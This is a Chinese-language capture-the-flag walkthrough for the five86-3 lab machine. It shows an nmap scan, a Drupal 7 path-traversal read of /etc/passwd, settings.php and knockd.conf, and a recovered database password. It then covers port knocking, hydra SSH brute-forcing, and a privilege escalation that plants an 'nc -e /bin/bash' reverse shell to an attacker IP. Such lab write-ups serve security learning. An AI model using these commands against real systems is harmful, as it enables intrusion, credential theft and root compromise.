five86-3

#主机探测-端口扫描 

1
2
arp-scan -l
nmap -A -p- -min-rate 8888 192.168.43.16

F12

#指纹识别-目录爆破 

1
2
whatweb 192.168.43.16
dirsearch -u 192.168.43.16

F34

#web界面 

1
2
3
4
5
#CMS:drupal 7
试了一圈dirsearch爆破出来的路径,没啥鸟用
#随便注册个用户,返回时发现变成了admin用户
#发现有图片上传
#尝试上传木马

Fweb

#BP抓包上传木马 

1
2
3
4
5
6
7
#先上传张图片抓包看看请求体
#复制
ontent-Disposition: form-data; name="files[picture_upload]"; filename="1.jpg"
Content-Type: image/jpeg
#再抓包上传马子
#改包,改格式--->上传成功
#百度一圈发现这个思路没啥鸟用,找不到上传路径

Fweb文件上传

F上码字

#搜drupal7的漏洞 

1
2
3
4
5
6
7
8
9
10
11
12
13
#发现任意文件读取漏洞
#https://www.exploit-db.com/
#Exploit Code:
http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
#kali curl一下 浏览器看实在麻烦
#/etc/passwd  得到几个用户名
curl http://192.168.43.16/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
#看下网站配置文件
curl http://192.168.43.16/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../var/www/html/sites/default/settings.php
#得到密码
'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'x4lB0XxX'

EXPD7

CURL看一下

#ssh敲门 

1
2
3
4
5
6
7
8
9
10
11
#唉,来个师傅解答一下:不指定22端口nmap就扫不到是咋回事
#先扫下22端口
nmap -p 22,80 -T4 -sT 192.168.43.16
#22端口被过滤了,猜测是由于knock配置导致,毕竟之前也学到过
#/etc/knockd.conf
curl http://192.168.43.16/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/knockd.conf
#15s内依次敲3个端口5004,4284,6872
#端口看房状态维持60s,过后需要再敲。
knock -d 200 192.168.43.16 5004 4284 6872
#再次查看22端口--->已是开启状态
namp -p 22 -sT 192.168.43.16

配置文件的密码

#ssh登录

1
2
3
4
5
6
#之前拿到了用户名和密码,hydra进行爆破
knock -d 200 192.168.43.16 5004 4284 6872
nmap -sT -p 22 192.168.43.16
hydra -L user.txt -P m.txt
#ssh登录sam
ssh [email protected]

SSH敲门

敲门+hydra+ssh登录

#sam信息收集 

1
2
3
sudo -l
#可root权限执行restart-web.sh
#sam对web.sh具有读写权限

#提取 

1
2
3
#提权
echo  “nc -e /bin/bash 192.168.43.33 8888” > restart-web.sh
sudo ./restart-web.sh

提权NC

#FLAG 

1
2
3
#kali反弹成功,拿到rootshell
id
cat /root/flag.txt

FLAG